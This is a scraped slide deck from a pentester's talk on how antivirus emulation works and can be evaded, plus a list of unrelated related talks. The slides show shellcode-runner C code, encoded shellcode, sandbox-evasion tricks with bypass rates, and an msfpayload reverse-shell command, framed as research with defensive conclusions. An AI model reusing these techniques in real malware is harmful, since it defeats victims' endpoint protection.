why antivirus software whoami
play

Why Antivirus Software whoami IT-Security Consultant Doing - PowerPoint PPT Presentation

Oct 01, 2022 •550 likes •1.06k views

Why Antivirus Software whoami IT-Security Consultant Doing pentesting since two years This talk is based on private research Before that experience as windows/linux/network admin, a little as web developer and so on...

  1. Why Antivirus Software

  2. whoami ● IT-Security Consultant ● Doing pentesting since two years ● This talk is based on private research ● Before that experience as windows/linux/network admin, a little as web developer and so on...

  3. Structure – Part I ● Introduction ● Steps for antivirus evasion – Evading signature-based detection – Evading sandboxing/emulation

  4. Structure – Part II ● Finding out how Antivirus Software works – More about x86 and code emulation – Windows API and standard calls – What about 64bit – And more

  5. Intro ● Started writing own antivirus evasion tools about 2 years ago ● The techniques used there show how antivirus software works ● Started more systematic testing ● Did some research about x86 emulation

  6. Intro Some words about the testing environment ● Windows XP/7/8, 32Bit, 64Bit ● Backtrack ● Metasploit ● Mingw ● Nasm ● ollydbg ● Visual Studio 2008 ● Virtualbox

  7. Intro Some words about the testing environment

  8. Intro Some words about the testing environment

  9. Intro Some words about the testing environment

  10. Part I Steps for antivirus evasion

  11. Steps for antivirus evasion Test Scenario Test Scenario ● Windows ● Windows ● Msfpayload ● Msfpayload ● Let's go through this fast ● Let's go through this fast

  12. Steps for antivirus evasion Download Proof-of-Concept code from all examples here: https://github.com/govolution/avepoc/

  13. Steps for antivirus evasion Evade signature scanning 1. Step: Have your own shellcode binder

  14. Steps for antivirus evasion Shellcode Binder Code: char shellcode[] = "Shellcode"; int main(int argc, char **argv) { int (*funct)(); funct = (int (*)()) shellcode; (int)(*funct)(); } //noencryption.c

  15. Steps for antivirus evasion Evade signature scanning 2nd Step: Encode or encrypt the shellcode

  16. //pseudocode //see also noevasion.c unsigned char buf[] = "fce8890000006089e531d2648b5230" "8b520c8b52148b72280fb74a2631ff" "31c0ac3c617c022c20c1cf0d01c7e2" -- SNIP -- unsigned char *shellcode; buffer2shellcode(); int (*funct)(); funct = (int (*)()) shellcode; (int)(*funct)();

  17. Steps for antivirus evasion 3rd Step: „Sandbox“ Evasion

  18. Steps for antivirus evasion 3rd Step: „Sandbox“ Evasion ● The file is still recognized as malicious... at least by most products ● Because of sandboxes, or better x86 emulation

  19. Steps for antivirus evasion 3rd Step: „Sandbox“ Evasion ● What to do now? ● Something to stop emulation! ● In my example: open a file

  20. Steps for antivirus evasion 3rd step: „Sandbox“ Evasion //see also fopen.c FILE *fp = fopen("c:\\windows\\system.ini", "rb"); if (fp == NULL) return 0; fclose(fp); int size = sizeof(buffer); shellcode = decode_shellcode(buffer,shellcode,size); exec_shellcode(shellcode);

  21. Part II Finding out how Antivirus Software works

  22. Finding out how Antivirus Software works x86 and code emulation ● No signature matches ● The programm will be executed in a „sandbox“ or better in an emulated environment ● This is limited by nature ● Let's have a look

  23. Finding out how Antivirus Software works x86 and code emulation As a short example you should take a look at libemu ● From website (http://libemu.carnivore.it/): ● Libemu is a tool for emulating shellcode ● Executing x86 instructions ● Reading x86 binary code – Register emulation – Basic FPU emulation – Shellcode execution ● Shellcode detection – Using GetPC heuristics ● Static analysis ● Binary backwardstraversal ● Win32 API hooking –

  24. Finding out how Antivirus Software works x86 and code emulation The emulation is executed in a loop: while() { If (command==“add“) do_some_add_stuff() Else if (command …) //you get the idea } // read more: The Art of Computer Virus Research and Defense by Peter Szor, Chapter 11.4. Code Emulation

  25. Finding out how Antivirus Software works ● From the paper „Sophail: A Critical Analysis of Sophos Antivirus“ (https://lock.cmpxchg8b.com/sophail.pdf): ● Sophos include a very simplistic x86 emulation engine that records memory references and execution characteristics. ● The emulation is a poor representation of x86, and only executed for around 500 cycles. ● Detecting the Sophos emulator is trivial, but spinning for 500 cycles on entry is sufficient to subvert emulation. ● Minimal OS stubs are present, but demonstrate a lack of understanding of basic concepts

  26. Finding out how Antivirus Software works ● As can be seen, x86 emulation has some limitations ● And here the interesting part begins ● Show some PoCs for AV evasion – Basic stuff – Standard calls and Win API – 64bit – And more...

  27. Finding out how Antivirus Software works Basics

  28. Finding out how Antivirus Software works Basics ● Eicar.exe - Test Virus ● Msf.exe - msfpayload generated .exe file ● Shikata5.c Shikata ga nai with 5 rounds ● Syringe.exe, a well known tool for executing shellcode and DLL- Injection, the only one here not recognized by most products

  29. Finding out how Antivirus Software works Basics ● Noencryption.c – a simple shellcode binder – 4/9 of the AVs failed – Successful in at least one product that officaly has x86 emulation :( ● Noevasion.c - no sandbox evasion, but encoded payload – 5/9 of the AVs failed

  30. Finding out how Antivirus Software works Standard and Windows API

  31. Finding out how Antivirus Software works Standard and Windows API // fopen.c 9/9 failed ... FILE *fp = fopen("c:\\windows\\system.ini", "rb"); if (fp == NULL) return 0; fclose(fp); ... shellcode = decode_shellcode(buffer,shellcode,size); exec_shellcode(shellcode); ...

  32. Finding out how Antivirus Software works Standard and Windows API // math.c, 9/9 failed int x,y; for (x=1; x<10000; x++) { for (y=1; y<10000; y++) { int a=cos(x); int b=cos(y); double c=sin(x); double d=sin(y); } } int size = sizeof(buffer); shellcode = decode_shellcode(buffer,shellcode,size); exec_shellcode(shellcode);

  33. Finding out how Antivirus Software works Standard and Windows API // getch.c 8/9 failed getch(); int size = sizeof(buffer); shellcode = decode_shellcode(buffer,shellcode,siz e); exec_shellcode(shellcode);

  34. Finding out how Antivirus Software works Standard and Windows API // openeventlog.c 7/9 failed HANDLE h; h = OpenEventLog( NULL, "Application"); if (h == NULL) printf("error\n"); int size = sizeof(buffer); shellcode = decode_shellcode(buffer,shellcode,size); exec_shellcode(shellcode);

  35. Finding out how Antivirus Software works Standard and Windows API // strstr.c 9/9 failed // from last years deepsec if(strstr(argv[0], "strstr.exe") > 0) { int size = sizeof(buffer); shellcode = decode_shellcode(buffer,shellcode,size); exec_shellcode(shellcode); }

  36. Finding out how Antivirus Software works Standard and Windows API // listen.c 8/9 failed ... bind(Socket,(SOCKADDR*) (&serverInf),sizeof(serverInf)); ... listen(Socket,1); ... shellcode = decode_shellcode(buffer,shellcode,size); exec_shellcode(shellcode);

  37. Finding out how Antivirus Software works What about 64 bit? // 64msf.exe 7/9 failed ● msfpayload windows/x64/shell/reverse_tcp LHOST=192.168.2.100 C ● Only two products recognized this one (Avast free, Comodo free)

  38. What about 64 bit? // 9/9 failed // 64noencryption.c unsigned char sc[] = ...; typedef void (*FUNCPTR)(); int main(int argc, char **argv) { FUNCPTR func; int len; DWORD oldProtect; len = sizeof(sc); if (0 == VirtualProtect(&sc, len, PAGE_EXECUTE_READWRITE, &oldProtect)) return 1; func = (FUNCPTR)sc; func(); return 0; }

  39. Finding out how Antivirus Software works And MMX? ● How does emulation handle MMX registers? ● For testing I used an encoder from the SLAE examples (Security Tube), so no code here... ● It is an xor encoder using the MMX registers ● 6/9 failed

  40. Finding out how Antivirus Software works Conclusion...

  41. Finding out how Antivirus Software works ● Antivirus has limits in: – Signature recognition – API call emulation – Processor emulation ● Even if features are implemented this doesn't mean it works

  42. Finding out how Antivirus Software works Detailed results

  43. Finding out how Antivirus Software works Detailed results

  44. Finding out how Antivirus Software works Detailed results

  45. Finding out how Antivirus Software works Detailed results

  46. Finding out how Antivirus Software works ● And now? ● Best would be whitelisting – If this works correctly ● Manual analysis – And distribute new signatures ● The usual – SIEM – Log file analysis – User awareness

  47. Do you like to know more? More links https://lock.cmpxchg8b.com/sophailv2.pdf ● https://lock.cmpxchg8b.com/sophail.pdf ● The Art of Computer Virus Research and Defense by Peter Szor ● http://packetstorm.foofus.com/papers/virus/BypassAVDynamics.pdf ● DeepSec 2013 Attila_Marosi - Easy Ways To Bypass AntiVirus Systems ● http://funoverip.net/ ●

Recommend

AI in Antivirus What AI do in your antivirus Who I am? Arcangelo Saracino Student of Computer

AI in Antivirus What AI do in your antivirus Who I am? Arcangelo Saracino Student of Computer

AI in Antivirus What AI do in your antivirus Who I am? Arcangelo Saracino Student of Computer Science at Uniba Three years of experience in web development Cybersecurity and Linux appassionate Mail: saracinoarcangelo@gmail.com Outline

363 views • 18 slides
HIGH-PERFORMANCE VMS USING OPENSTACK NOVA by Nikola ipanov $ WHOAMI $ WHOAMI Software

HIGH-PERFORMANCE VMS USING OPENSTACK NOVA by Nikola ipanov $ WHOAMI $ WHOAMI Software

HIGH-PERFORMANCE VMS USING OPENSTACK NOVA by Nikola ipanov $ WHOAMI $ WHOAMI Software engineer @ Red Hat Working on OpenStack Nova since 2012 Nova core developer since 2013 THIS TALK THIS TALK OpenStack - the elastic cloud High-perf

455 views • 34 slides
Application-Level Reconnaissance: Timing Channel Attacks Against Antivirus Software Mohammed I.

Application-Level Reconnaissance: Timing Channel Attacks Against Antivirus Software Mohammed I.

Application-Level Reconnaissance: Timing Channel Attacks Against Antivirus Software Mohammed I. Al-Saleh and Jedidiah R. Crandall Server Reconnaissance OS &amp; Services ports Client Server Client Reconnaissance Hmmm, what can I get about

705 views • 27 slides
Coding interviews: What to expect and how to prepare whoami Software engineer by trade

Coding interviews: What to expect and how to prepare whoami Software engineer by trade

Coding interviews: What to expect and how to prepare whoami Software engineer by trade Interested in making IT-recruiting suck less Outline 1. Resume 2. Coding questions 3. How to interview your interviewers Software engineering

243 views • 12 slides
Thinking on Uses of Dynamic Analysis for Software Security ben-holland.com $ whoami 2005

Thinking on Uses of Dynamic Analysis for Software Security ben-holland.com $ whoami 2005

Thinking on Uses of Dynamic Analysis for Software Security ben-holland.com $ whoami 2005 2010 B.S. in Computer Engineering Wabtec Railway Electronics, Ames Lab (DOE), Rockwell Collins: Software Engineer Intern 2010

890 views • 88 slides
Machine Learning What, how, why? Rmi Emonet (@remiemonet) 2015-09-30 Web En Vert $ whoami $

Machine Learning What, how, why? Rmi Emonet (@remiemonet) 2015-09-30 Web En Vert $ whoami $

Machine Learning What, how, why? Rmi Emonet (@remiemonet) 2015-09-30 Web En Vert $ whoami $ whoami Software Engineer Researcher: machine learning, computer vision Teacher: web technologies, computing literacy Geek: deck.js slides,

626 views • 58 slides
BREAKING INTO SOFTWARE DEFINED RADIO Presented by Kelly Albrink WHOAMI Kelly Albrink

BREAKING INTO SOFTWARE DEFINED RADIO Presented by Kelly Albrink WHOAMI Kelly Albrink

BREAKING INTO SOFTWARE DEFINED RADIO Presented by Kelly Albrink WHOAMI Kelly Albrink Pentester at Bishop Fox Specialize in network, wireless, and hardware security Member of Noisebridge Hackerspace in San Francisco Loves 3D

659 views • 40 slides
Web Technologies in Java EE JAX-RS 2.0, JSON-P, WebSocket, JSF 2.2 $ whoami Luk Fry

Web Technologies in Java EE JAX-RS 2.0, JSON-P, WebSocket, JSF 2.2 $ whoami Luk Fry

Web Technologies in Java EE JAX-RS 2.0, JSON-P, WebSocket, JSF 2.2 $ whoami Luk Fry Software Engineer, JBoss, Red Hat AeroGear, (Arquillian, RichFaces) Interests HTML5, Web Components, AngularJS Living and

1.17k views • 83 slides
Service Management with systemd Michal Seklet ar msekleta@redhat.com October 29, 2017 whoami

Service Management with systemd Michal Seklet ar msekleta@redhat.com October 29, 2017 whoami

Service Management with systemd Michal Seklet ar msekleta@redhat.com October 29, 2017 whoami Senior Software Engineer @ Red Hat systemd and udev maintainer Free/Open source software contributor 2 / 52 Administration 13:30 Welcome

1.07k views • 52 slides
Agility and FOSS whoami Hakel Gumar Fedora Packager since 2006 Senior Software Engineer @

Agility and FOSS whoami Hakel Gumar Fedora Packager since 2006 Senior Software Engineer @

Agility and FOSS whoami Hakel Gumar Fedora Packager since 2006 Senior Software Engineer @ SysFera Certifjed &quot;Scum&quot; Master Values Agile Manifesto 4 values 1. Individuals and interactions over processes and tools 2. Working

444 views • 22 slides
1 Agenda Docker world Containers VS Virtual machine Security concerns Conclusion Whoami

1 Agenda Docker world Containers VS Virtual machine Security concerns Conclusion Whoami

12.03.2019 Docker security 1 Agenda Docker world Containers VS Virtual machine Security concerns Conclusion Whoami M.Sc Computer Security M.Sc Software Development Worked previously as an embedded software developer Actually

586 views • 54 slides
Antivirus Engine Giorgos Vasiliadis and Sotiris Ioannidis FORTH-ICS, Greece RAID10, 15

Antivirus Engine Giorgos Vasiliadis and Sotiris Ioannidis FORTH-ICS, Greece RAID10, 15

GrAVity: A Massively Parallel Antivirus Engine Giorgos Vasiliadis and Sotiris Ioannidis FORTH-ICS, Greece RAID10, 15 September 2010 Overview Increase the processing throughput of virus scanning applications, using the Graphics

563 views • 28 slides
Platforms FTW! Matt OKeefe $ whoami Developer -&gt; Architect -&gt; CTO $ whoami

Platforms FTW! Matt OKeefe $ whoami Developer -&gt; Architect -&gt; CTO $ whoami

Platforms FTW! Matt OKeefe $ whoami Developer -&gt; Architect -&gt; CTO $ whoami -O RLY? Developer -&gt; Architect -&gt; CTO What is a Platform? Mise en place for developers In slightly more technical terms

622 views • 39 slides
Conce Concept of pt of T TAP(T AP(Tar arge geted ted Antivir Antivirus us Pr Prop ophy

Conce Concept of pt of T TAP(T AP(Tar arge geted ted Antivir Antivirus us Pr Prop ophy

Conce Concept of pt of T TAP(T AP(Tar arge geted ted Antivir Antivirus us Pr Prop ophy hylax laxis) is) Drug dis istr tributions an and re remote te con onsulta tation jus just t before th the ou outb tbreak Isao

669 views • 7 slides
basho Thursday, 11 April 13 $ Thursday, 11 April 13 $ whoami Thursday, 11 April 13 $ whoami

basho Thursday, 11 April 13 $ Thursday, 11 April 13 $ whoami Thursday, 11 April 13 $ whoami

Killing pigs and saving Danish bacon GOTO Zurich Zurich, Switzerland 11th April 2013 basho Thursday, 11 April 13 $ Thursday, 11 April 13 $ whoami Thursday, 11 April 13 $ whoami Name: Matthew Revell Title:

1.55k views • 111 slides
Counterattack Turning the tables on exploitation attempts from tools like Metasploit whoami

Counterattack Turning the tables on exploitation attempts from tools like Metasploit whoami

Counterattack Turning the tables on exploitation attempts from tools like Metasploit whoami scriptjunkie Security research Metasploit contributor whoami wrote this thing whoami I work here Disclaimer This

1.02k views • 76 slides
Myth Busters Open source and Security By Aseem Jakhar $ whoami $ whoami We break break

Myth Busters Open source and Security By Aseem Jakhar $ whoami $ whoami We break break

Myth Busters Open source and Security By Aseem Jakhar $ whoami $ whoami We break break things! things! We $ whoami When not working, we do charity $ whoami When not working, we do charity By breaking products for free :)

659 views • 28 slides
Multitasking on Cortex-M(0) class MCU A deepdive into the Chromium-EC scheduler $whoami

Multitasking on Cortex-M(0) class MCU A deepdive into the Chromium-EC scheduler $whoami

Multitasking on Cortex-M(0) class MCU A deepdive into the Chromium-EC scheduler $whoami Embedded Software Engineer at National Instruments We just finished our first product using Chromium-EC and future ones to come Other stuff I

848 views • 42 slides
Using Mimikatz driver to unhook antivirus on Windows Supervisor: Cedric van Bockhaven Bram

Using Mimikatz driver to unhook antivirus on Windows Supervisor: Cedric van Bockhaven Bram

Using Mimikatz driver to unhook antivirus on Windows Supervisor: Cedric van Bockhaven Bram Blaauwendraad &amp; Thomas Ouddeken Mimikatz Post exploitation tool created by Benjamin Delpy Administrative privileges required Used to extract

355 views • 20 slides
A Close Look at Rogue Antivirus Programs Alain Zidouemba About the VRT Mission: Provide

A Close Look at Rogue Antivirus Programs Alain Zidouemba About the VRT Mission: Provide

A Close Look at Rogue Antivirus Programs Alain Zidouemba About the VRT Mission: Provide intelligence and protection to allow our customers to focus on their core business Responsibilities Threat Intelligence and monitoring

873 views • 51 slides
How to do it Wrong: Smartphone Antivirus and Security Applications Under Fire Stephan Huber,

How to do it Wrong: Smartphone Antivirus and Security Applications Under Fire Stephan Huber,

How to do it Wrong: Smartphone Antivirus and Security Applications Under Fire Stephan Huber, Siegfried Rasthofer, Steven Arzt, Michael Trger, Andreas Wittmann, Philipp Roskosch, Daniel Magin 1 Who are we Stephan Siegfried Mobile

751 views • 50 slides
Dan Cashman September 15th, 2017 $ whoami Dan Cashman - dcashman@google.com Android

Dan Cashman September 15th, 2017 $ whoami Dan Cashman - dcashman@google.com Android

SELinux in Android Oreo or: How I Learned to Stop Worrying and Love Attributes Dan Cashman September 15th, 2017 $ whoami Dan Cashman - dcashman@google.com Android Security since 2013 Software Engineer Acknowledgements

627 views • 40 slides
Dan Cashman September 15th, 2017 $ whoami Dan Cashman - dcashman@google.com Android

Dan Cashman September 15th, 2017 $ whoami Dan Cashman - dcashman@google.com Android

SELinux in Android Oreo or: How I Learned to Stop Worrying and Love Attributes Dan Cashman September 15th, 2017 $ whoami Dan Cashman - dcashman@google.com Android Security since 2013 Software Engineer Acknowledgements

927 views • 38 slides
AV-Meter: An Evaluation of Antivirus Scans and Labels Omar Alrawi (Qatar Computing Research

AV-Meter: An Evaluation of Antivirus Scans and Labels Omar Alrawi (Qatar Computing Research

AV-Meter: An Evaluation of Antivirus Scans and Labels Omar Alrawi (Qatar Computing Research Institute) Joint with Aziz Mohaisen (VeriSign Labs) Overview Introduction to problem Evaluation metrics Dataset gathering and use

651 views • 22 slides

More recommend